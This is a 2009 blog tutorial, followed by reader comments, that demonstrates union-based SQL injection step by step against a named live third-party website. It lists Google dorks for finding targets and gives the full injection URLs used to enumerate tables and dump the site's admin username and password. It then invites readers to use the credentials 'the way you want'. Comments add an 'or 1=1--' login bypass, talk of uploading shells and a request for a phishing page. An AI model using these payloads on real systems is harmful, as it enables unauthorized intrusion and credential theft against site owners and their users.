Sql Injection - Practically Detailed

by Nishant.Soni on 08/04/09 at 5:31 pm We just found a good security expert (Nishant Soni) to teach you some real hard core hacking stuff, He is going to teach you about SQL Injection, Sniffing, Trojans and many more topics. Hope you enjoy them. Welcome to my very first tutorial for SQL Injection on Genius hackers. SQL Injection basically means to execute a query in the database which is connected to the website to get personal information out of it, which is not visible to a normal user. Database is most likely to be a part of the websites, which saves all the information like user names, passwords, posts, replies in it. So there is a possibility that you might put some commands or queries or requests whatever you want to call it into the database to get some hidden information out of it. It is noticed that in the past SQL Injection have been used several times to steal the credit card information, E-mail address and passwords, because most of the users have same E-mail address and passwords into all of their E-mail accounts. So if you manage to hack one of the accounts, you may just get access to all of their accounts. SQL Injection is most likely used by the “Penetration Testers” to check if the website of their clients is vulnerable to some kind of attacks to steal the information. Here, in this article I will show you how they do it. There are some simple terms expected out of you and one of them is that you understand the basic knowledge of the computer. This tutorial will let you know, how to start? Where to stop? what to do? And if you have any further queries you can post them here and i will help you to work with it. PLEASE REMEMBER: Nishant Soni or Genius Hackers take no responsibility of whatsoever damaged is made by you by this knowledge. This is just for the educational purposes so you can secure your own website. I will divide this tutorial into some points so it can help you in a better way to understand the structure of the SQL Database which is working at the backend of the website to store, save and execute the information. I will use a LIVE website in this tutorial, so you can try to test it on your own and believe me it really helps to develop your skills. The website that I will use today is www[dot]rfidupdate[dot]com. To understand what is an SQL Database, the very simple thing i can explain to you is the “website where you can register, login or create your own profile. Because it will save the data you input into your profile and will execute / display them whenever you provide the correct username or the password. So in the same way the website i mentioned above will give you a chance to be a part of it, it will update you daily about respective news. 1. How to check if the website is vulnerable to SQL Injection? A: On most of the website i read people saying that try to add “`” at the end [without quotes], and if you get some error that means that the website is vulnerable to SQL Injection. But being an experienced guy in the penetration, i’d rather tell you that this is a TOTAL MYTH. The best way to check the site vulnerability is to add “+order+by+6753″ at the end of the URL. Because, 97% of the websites don’t have more then 6753. columns. So by adding 6753 number, you will check if it has 6753 columns, which it apperatenly doesn’t have. So it will give you an error, and if it does that means that the WEBSITE IS VULNERABLE. It is generally noticed that a website doesn’t have more than 100 columns at the most in its database. So by entering the number 6753, you are trying to make it sure if the website gives you an error with it. IF it does

that means you can proceed further. To check an SQL Injection, its mandatory that the website should be pointing it self to some specific page, i.e. “website.com/index.php?page=11″. So in this case the website is pointing it self to page Number.11 to pull up some specific information. So, to check if the website is vulnerable or not, you can try with the following URL. i.e. “website.com/index.php?page=11+order+by+6753″. 2. How would i find the vulnerable websites? A.: Google is the best friend of Hackers, when I say this don’t assume that i am just writing it because i am supposed it. I really mean it. There is something called as “google dorks”, which are basically a command which could be put into the Google search to find out specific groups of pages. here are some Google dorks which you may try to find out the vulnerable websites. a. inurl:index.php?page= b. inurl:members.php?member= c. inurl:index.php?id= d. inurl:articles.php?page= This will help you to find out the websites which are connected and working with SQL Databases at the backend. Some of them might be vulnerable to SQL Injection. So you can try to put “order+by+6753″ at the end of the URL to check if its vulnerable. Step 1 : Finding Vulnerable Page. Lets start, as you’ll know the website that i will test today is www.RfidUpdate.com. So lets open up the website in the browser. So just a little information about website, RFID means “radio frequency identification”. So on the right hand side you will see that it gives you an opportunity to subscribe to the website. So now it should give you an idea that when you subscribe to it, there has to be a place where your E-mail address should be saved, so it has to have a database! So, now we know that the website is supported by an SQL Database at the backend. So we are on the right track. As I have written earlier, in order to perform an SQL Injection we will have to find a page that has “something.php?id=2121″ at the end of the URL, so we will try to find such page on RfidUpdate.com. I have found a page by exploring the website a bit. The URL of the page is, http://www.rfidupdate.com/articles/index.php?id=1563

Image 1: SQL Injection (Click to enlarge )

So now, we know it has an SQL Database and we have the page where we can start with. So lets try to check if the website is vulnerable to SQL Attack, we will try to add “+order+by+6753–” as i have written earlier. http://www.rfidupdate.com/articles/index.php?id=1563+order+by+6753– Now, you should have noticed an error, which says : “Error 1054: Unknown column ‘6753′ in ‘order clause’” So, It means that the database gave u a message saying “there is no such column”. So error doesn’t really make any difference, but the main thing we should notice is that the database communicated with us directly. So there is a possibility that we can exploit it. Step 2 : Finding Number of Columns. Now, the next thing we will try is to find the out many columns do this page have. So now, instead of “6753″, we will start from number 1 then 5 then 15, we will keep doing this unless we get some error. So, try the following url. http://www.rfidupdate.com/articles/index.php?id=1563+order+by+1– The webpage opened up fine, which means that the website has more then 1 column, now try number 5. http://www.rfidupdate.com/articles/index.php?id=1563+order+by+5– Same thing, now try 10. http://www.rfidupdate.com/articles/index.php?id=1563+order+by+10– Still no error, try 15. http://www.rfidupdate.com/articles/index.php?id=1563+order+by+15– Still no error :(, try 20. http://www.rfidupdate.com/articles/index.php?id=1563+order+by+20-WHOA!, We got the error, which means that the number of columns in the webpage is between 15 to 20. So lets try with number “16″ now. http://www.rfidupdate.com/articles/index.php?id=1563+order+by+16– YAY!, you got the error on number “16″ as well. Which means, that the website has 15 columns. So now lets move further. Step 3 : Using “Union Select All” Command. Now, we will try to combine all the columns and we will see what do we get, the command goes as follow:http://www.rfidupdate.com/articles/index.php?id=1563+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15–

Image 2: SQL Injection (Click to enlarge ) FYI:- please notice tha ti have added “-” before 1563. Now you see some broken things in there, and now you see that the only independent number of column you see on the website is “7″. So apparently that would be the base of the attack . Everything we do now, would be done with the column number “7″. So we wil ltry to find the some more information about the DATABASE this website is using, so to do this we can replace the column number 7 with “@@version“, without quotes of course. So try this now. http://www.rfidupdate.com/articles/index.php?id=1563+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15–

Image 3: SQL Injection (Click to enlarge ) This is what you should see now, “5.0.67-community” Which means, that the website is using SQL Version > 5. Now, try following URL to move further. http://www.rfidupdate.com/articles/index.php?id=1563+union+all+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15+from%2 0information_schema.tables%20where%20table_Schema=database%20()–

Image 4: SQL Injection (Click to enlarge)

Here, we have replaced No.7 column with “group_concat(table_name)” and we have added “from information_schema. tables where table_Schema=database ()” at the end. Which are basically the standard commands for SQL, to get the further information from the specific column. YAY! You should have already noticed that the name of the further columns have appeared in the list and one of them is “ru_Admin”. Thats what we are looking for. Since we have the column for admin now, we will try to find out the username and password out of it. So let try following URL into the address bar. http://www.rfidupdate.com/articles/index.php?id=1563+union+all+select+1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15+from% 20information_schema.columns%20where%20table_Schema=database%20()– The only thing we’ve changed here is the “tables” to “columns”, and you should see all the information about the admin’s tables now which should look something like following. “ru_Admin_Username,ru_Admin_Password” So we see, we might be able to crack the username as well as the password. In order to see the information inside the username and the password column lets put following URL: http://www.rfidupdate.com/articles/index.php?id=1563+union+all+select+1,2,3,4,5,6,group_concat(ru_Admin_username,0×3a,ru_Admin_passw ord),8,9,10,11,12,13,14,15+from%20ru_Admin– What we did is, to replace the columns names with admin_username & admin_password, and call it from ru_Admin column at the end.

Image 5: SQL Injection (Click to enlarge ) VOILA! What you’re looking at right now the “admin” username and the password in following format. username : password. admin:admRIvuxHahkQ FYI: Wherever you see “%20″ in the URL, that means a SPACE in the address bar. So you have the password now, you can use it the way you want!. So this the way to perform an SQL Injection attack. You may try your own stuffs with the google dorks i posted in the beginning. Use it the way you want, just keep in mind that if u know 80/100, there are people out there who know 90/100. So better secure yourself first, and try these attacks with the permission of the site owners.

Thank you all for reading this tutorial, I am sure it helped. If there are any more questions feel free to revert back to the same post. Enjoy Ethical hacking Little About Me: I am from Mumbai, have been in Australia and U.S. for few years, and my website could be found at www.TechMafias.com GH-Exclusive, Hacking , Hacking, sql injection, web hacking, website attacks

Related Posts •

XSS (Cross Site Scripting)

•

How To Defend An Input Validation Attack

•

Reveal the passwords behind ****

•

Connect to any computer in the world using TeamViewer

Stay Updated You don't wanna miss our articles. Really! Grab the RSS feed Or, Subscribe via E-Mail Enter your e-M http://feeds.feedb GeniusHackers.c

en_US

Subscribe

42 Responses to “SQL Injection : Ultimate method for Website Hacking.”

1. Ashwin Apr 8th, 2009 Thank you very much.

2. rAX Apr 9th, 2009 Thank you so much for the effort, it’s really educative ! I want to ask you though, what do I need to learn to be a penetration expert? (for good purpose).

3. tez2fast Apr 9th, 2009 Thats Nice 1 Man,… keep On Such Thing,..

4. irad Apr 9th, 2009 thank you….thank you very much

5. Nishant.Soni Apr 9th, 2009 @ rAX, Penetration is a field where you need to gain the knowledge first and then the practical experience, more you explore better you learn. This is the ONLY field which is never gonna die. There are different types of ETHICAL HACKERS, some of for APPLICATION BASED TESTING, some work for WEB TESTING, so it depends where do you want to expertise.

6. Tejas Dave Apr 9th, 2009 lol…..Nishant no offence but im sure u cannot hack sites using sql injection anymore & the passwords u get in sql are in md5 formats or salted md5 so u cant use dem directly.plus direct xml parsing is now old & can b used for hacking small sites which r not even worth a single $.

7. Tejas Dave Apr 9th, 2009

& yes new ways of hacking sites are by rooting servers.thats called real hacking & if u want some examples or tutorials den i can provide u wid dem

8. Nishant.Soni Apr 9th, 2009 @Tejas Dave: We are talking about ETHICAL HACKING In here, and if you are saying that we can not hack the site with SQL Injections, then I am sorry but you’re completely wrong. 1. MD5: Use Cain & Able to decrypt the md5 hashes, its decrypted with the help of bruteforcing attack. 2. I am soon gonna write another article about “uploading shells” with sql injection, so that will basically grant u access to the entire http://ftp. 3. You can easily manipulate config.php with the sql injection, and u can make it vulnerable to RFI or LFI [if u know about them] 4. As far as rooting is concerned, i thought not to post it since I wasn’t sure if the readers are good enough to understand it in just one go.

9. Nishant.Soni Apr 9th, 2009 Yea one more thing, for the MD5 hash cracking, you can have a look at this video. http://techmafias.com/forum/Thread-decrypting-md5-hashes

10. john clay Apr 9th, 2009 well , a nice read material. will love to have more of this to read…simple and straight to the point. 1love Bro.

11. tejas dave

Apr 9th, 2009 dude ur telling me that using cain & able u can crack all md5?r u joking.u can crack normal md5 but not salted hashes.

12. Sharad Apr 9th, 2009 I just looking for this. Thanks

13. Randheer Singh Apr 10th, 2009 Thanks very much. I was building a website now I can think on these attacks.

14. Nishant.Soni Apr 10th, 2009 @tejas_dave: Most of the hashes are normal MD5s and if the website is using some specific software like some forum through SMF, phpBB,myBb or a blog like wordpress then the hashes are converted into respective flavors. As far as decrypting the SALTED and the SHVA hashes are concerned, i will write an article soon about that. Please ask your questions out of curiosity, your question are more about agression and offense rather then confusion, objection or dbout. We are here to share the knowledge, if you think you something on top of this, then try to write an article, don’t try to create a chaos. P.S.: Please remember, i try to teach ETHICAL, i wudn’t suggest any one to missuse it.

15. Nishant.Soni Apr 10th, 2009

Here is a list of SQL Injection commands / queries which you may try to understand it better. ABORT — abort the current transaction ALTER DATABASE — change a database ALTER GROUP — add users to a group or remove users from a group ALTER TABLE — change the definition of a table ALTER TRIGGER — change the definition of a trigger ALTER USER — change a database user account ANALYZE — collect statistics about a database BEGIN — start a transaction block CHECKPOINT — force a transaction log checkpoint CLOSE — close a cursor CLUSTER — cluster a table according to an index COMMENT — define or change the comment of an object COMMIT — commit the current transaction COPY — copy data between files and tables CREATE AGGREGATE — define a new aggregate function CREATE CAST — define a user-defined cast CREATE CONSTRAINT TRIGGER — define a new constraint trigger CREATE CONVERSION — define a user-defined conversion CREATE DATABASE — create a new database CREATE DOMAIN — define a new domain CREATE FUNCTION — define a new function CREATE GROUP — define a new user group CREATE INDEX — define a new index CREATE LANGUAGE — define a new procedural language CREATE OPERATOR — define a new operator CREATE OPERATOR CLASS — define a new operator class for indexes CREATE RULE — define a new rewrite rule CREATE SCHEMA — define a new schema CREATE SEQUENCE — define a new sequence generator CREATE TABLE — define a new table CREATE TABLE AS — create a new table from the results of a query CREATE TRIGGER — define a new trigger CREATE TYPE — define a new data type CREATE USER — define a new database user account CREATE VIEW — define a new view DEALLOCATE — remove a prepared query DECLARE — define a cursor DELETE — delete rows of a table DROP AGGREGATE — remove a user-defined aggregate function DROP CAST — remove a user-defined cast DROP CONVERSION — remove a user-defined conversion DROP DATABASE — remove a database DROP DOMAIN — remove a user-defined domain DROP FUNCTION — remove a user-defined function DROP GROUP — remove a user group DROP INDEX — remove an index

DROP LANGUAGE — remove a user-defined procedural language DROP OPERATOR — remove a user-defined operator DROP OPERATOR CLASS — remove a user-defined operator class DROP RULE — remove a rewrite rule DROP SCHEMA — remove a schema DROP SEQUENCE — remove a sequence DROP TABLE — remove a table DROP TRIGGER — remove a trigger DROP TYPE — remove a user-defined data type DROP USER — remove a database user account DROP VIEW — remove a view END — commit the current transaction EXECUTE — execute a prepared query EXPLAIN — show the execution plan of a statement FETCH — retrieve rows from a table using a cursor GRANT — define access privileges INSERT — create new rows in a table LISTEN — listen for a notification LOAD — load or reload a shared library file LOCK — explicitly lock a table MOVE — position a cursor on a specified row of a table NOTIFY — generate a notification PREPARE — create a prepared query REINDEX — rebuild corrupted indexes RESET — restore the value of a run-time parameter to a default value REVOKE — remove access privileges ROLLBACK — abort the current transaction SELECT — retrieve rows from a table or view SELECT INTO — create a new table from the results of a query SET — change a run-time parameter SET CONSTRAINTS — set the constraint mode of the current transaction SET SESSION AUTHORIZATION — set the session user identifier and the current user identifier of the current session SET TRANSACTION — set the characteristics of the current transaction SHOW — show the value of a run-time parameter START TRANSACTION — start a transaction block TRUNCATE — empty a table UNLISTEN — stop listening for a notification UPDATE — update rows of a table VACUUM — garbage-collect and optionally analyze a database

16. XERO Apr 11th, 2009

HI Excellent tutorial and it cleared my doubts. However I would like to ask if there are ways to hack PHP pages with similar encoding like SQL injections ? I would like to ask if there are similar techniques involved in hacking PHP based username pass forms or websites ? Thanks -XERO

17. prashanth Apr 11th, 2009 i need to make a fake login page for hotmail… Can you help me with it?? if you can then mail me to “[email protected]”

18. Nishant.Soni Apr 12th, 2009 @XERO. It really depends if there are some vulnerabilities in that php page. If you can give an example of the page you’re talking about, it would be easier for me to help you.

19. Syed.atif Apr 13th, 2009 Hello Nishant.Soni i am just a network guy, this artical came across me so Just want to request that as an expert of Penetration can u also provide tips and suggestion to secure the sites for this sort of attacks. regards

20. Ajaykumar Apr 14th, 2009

hiiiiiii i’m new to SQL but i unerstood the concept of ur injection.but i dont know what to do that ADMIN username and password. where shal i use them???

21. Ajaykumar Apr 14th, 2009 at the last of the ur injection we get only admin username only but not the password but u r showing it

22. Nishant.Soni Apr 14th, 2009 @ Syed.atif :- To secure the website from this kind of attack, you have to make sure that your website doesnt follow every path. I mean it should be redirected to the index page if some unknown page is attempted to access. @Ajay kumar: With the admin username and password, you can login to “admin control panel”. Thats ur job to find it. Because i wudn’t prefer to show the admin control panel on that site in here.

23. Drexler Apr 17th, 2009 Thanks for this leason hummm so interesting,…am new here dough but while going through the process, most of the link displayed error. from the step 2 down. Anyway keep it up…you good…cheer

24. Ajaykumar Apr 17th, 2009 But how can i know the admin page who is providing data base to the site.I’m in initial stages plss help me

25. Ajaykumar Apr 17th, 2009 @Drexler:: hey they are working links from step 2 u have to remove “-” at the end of the links . ru getting me

26. Vinayak Apr 18th, 2009 Thanks Nishant A Very Useful Tutorial I Have Found The Admin Login Page But To Login Do I Need To Use Any Proxy ???

27. Nishant.Soni Apr 19th, 2009 @Vinayak: 1. I don’t support un-ethical stuffs 2. Everyone can track the login logs in admin control panel 3. Rather then trying to mess with the site, i will suggest you to contact the website owner and let them know about the vulnerability.

28. Parag Apr 19th, 2009 Dude the link at the end which leads to username and password does not work.

29. Nishant.Soni

Apr 19th, 2009 @Parag: Since i’ve copy pasted the links, the format has been disordered. So, you will have to manually type it into your address bar. It will work

30. askoppal Apr 19th, 2009 @Nishant.Soni MD5(Message-Digest algorithm 5) is an irreversible hash which cannot be ‘decrypted’.If anybody said it can be decrypted its just NONSENSE. Now you may be thinking how Cain & Able and other sites decrypt those MD5 hashes,its done by a simple technique. Just type in text and produce a MD5 encryption of that text. The text and the MD5 hash is then inserted into a table. To ‘decrypt’, cain and able just search in that table for similar hashes, known as an MD5 rainbow table. If I have a password “genius” or “hacker”.You can find it easily on that table because its common words.That’s the reason you shouldn’t use common words as passwords. But if I have a password like “278askoppal345″ chance of being in the database, and is unlikely anyone in the world has the same password. Therefore, it has very “little chance” of ending up in a database. If you want to make it even more secured against decryption (for covering those “little chances”)we use a common technique called salt the password thats what Tejas Dave have mentioned.I will just explain one method of it i.e. adding characters along with password before its being hashed.Even if my password is in the rainbow table the hacker cannot decrypt my password because he doesn’t know my salting technique. Secondly, You cannot have an article on “decrypting salted md5 and SHA” . Because its pointless like making coffee and asking to “decrypt” the milk from it. -askoppal.com “My ignorance always amuses me”

31. Nishant.Soni Apr 20th, 2009 @ askoppal.

1. I like you, because ur the best person who knows how to divert minds from actual topic. 2. What you’re talking about is just CRACKING, what i referred to was “Brute forcing” MD5s. 3. Nice example of coffee and milk, i know u cant decrypt milk out of coffee, but yes you can understand that coffee has, milk, sugar etc.. 4. Y i don’t see any of your articles “mate”!?

32. Nishant.Soni Apr 20th, 2009 @ Askoppal: Sorry i forgot to add. 1. When we talk about MD5, we dont say “hack”, we say “crack”. So it should come to your mind that, the word “crack” means a possibility not certainty. 2. Thats why people release their “dictionaries” so they can be used for “dictionaries cracking attempts” 3. and atlast i ‘ve already wrote about brute forcing above.

33. askoppal Apr 20th, 2009 @Nishant.Soni NISHANT: I like you, because ur the best person who knows how to divert minds from actual topic. ASKOPPAL:I am just questioning the statements you made. NISHANT: What you’re talking about is just CRACKING, what i referred to was “Brute forcing” MD5s. ASKOPPAL:You make me laugh…. Bruteforcing is a way of cracking.I was talking about PRECOMPUTATION in my comments. Dude its impossible to decrypt MD5 using the method “Brute forcing” You may find internet articles or post where people relate brute forcing and MD5 but its a common mistake,The method they actually mean is “precomputation” (Using rainbow tables). If you are so particular that you can do it please decrypt this normal MD5 hash (It is not salted) which is an easy guess for a security expert like you fedd0876f12728f8ef6890fbfed25edd

GH audience will be eager to see you decrypting those, don’t disappoint them Nishant. NISHANT: Nice example of coffee and milk, i know u cant decrypt milk out of coffee, but yes you can understand that coffee has, milk, sugar etc.. ASKOPPAL:You wont know coffee has adequate amount of milk and sugar unless you taste it NISHANT: Y i don’t see any of your articles “mate”!? ASKOPPAL: I blog at http://45k.me sponsored by Sathish NISHANT:When we talk about MD5, we dont say “hack”, we say “crack”. So it should come to your mind that, the word “crack” means a possibility not certainty.Thats why people release their “dictionaries” so they can be used for “dictionaries cracking attempts” and atlast i ‘ve already wrote about brute forcing above. ASKOPPAL: You are proving yourself to be a jackass or an english mentor or something else.The above statement is just nonsense. -askoppal.com “My ignorance always amuses me”

34. askoppal Apr 22nd, 2009 The hash value fedd0876f12728f8ef6890fbfed25edd which I gave to Nishant is decrypted to N.i.s.h.a.n.t S.o.n.i You can confirm the accuracy of the hash using an on-line hash generator created by me http://45k.me/blog/2009/04/md5-sha1-sha256-hashing/ If we use a Bruteforce method it would took around 262800 hrs. i.e. 30 years in a 3 Ghz , 2Gb RAM equipped system to decrypt the above hash even if i know the keyspace of the password.So Brute force ain’t a good technique to crack admin’s password. -askoppal

35. Nishant.Soni Apr 23rd, 2009 @askoppal: That is the only reason i said it isnt 100%. MD5 is a nice algorithm. It may work it may not. OR u may have to wait for a long time.

36. raaghav Apr 23rd, 2009 nice totorial , i ll try it on other sites too

37. Panwar Apr 27th, 2009 Thanks for nice article everything is clear but i am stuck at two points. 1-How to find sites where we can put sql injections as you described it well but if you plz put some more light on it then it will be very usefull. 2-Last url is not working to get username and password as i have also added code manually in second last url, i mean i add admin_username & admin_password and put ru_Admin but no work. Also from where we have to start learning from newbie to expert, so we can safe our sites ?

38. junaid Apr 28th, 2009 thanks, it really helping

39. xXXh4Ck3rXXx Apr 28th, 2009 hey dude the tuts if u make a video becomes more user friendly and try and teach others advanced thing this is t00 n00bish and too basic

40.

Neo_Warez May 1st, 2009 Dude! I love this post, i think this is the first time i’m posting here on Genius Hackers…..I love ur post!!

41. des May 5th, 2009 Hello Nishant, I wonder what is your nick name on techm forum, I would like to have your opinion on the topic, which I recently open there. thx.

42. Kalpana Jun 2nd, 2009 hi Nishant Thanks its a good article. My question is can we login in to a web page without userid and pwd??? i read an article by viewing web page source we can login ex: ‘ or 1=1– using these types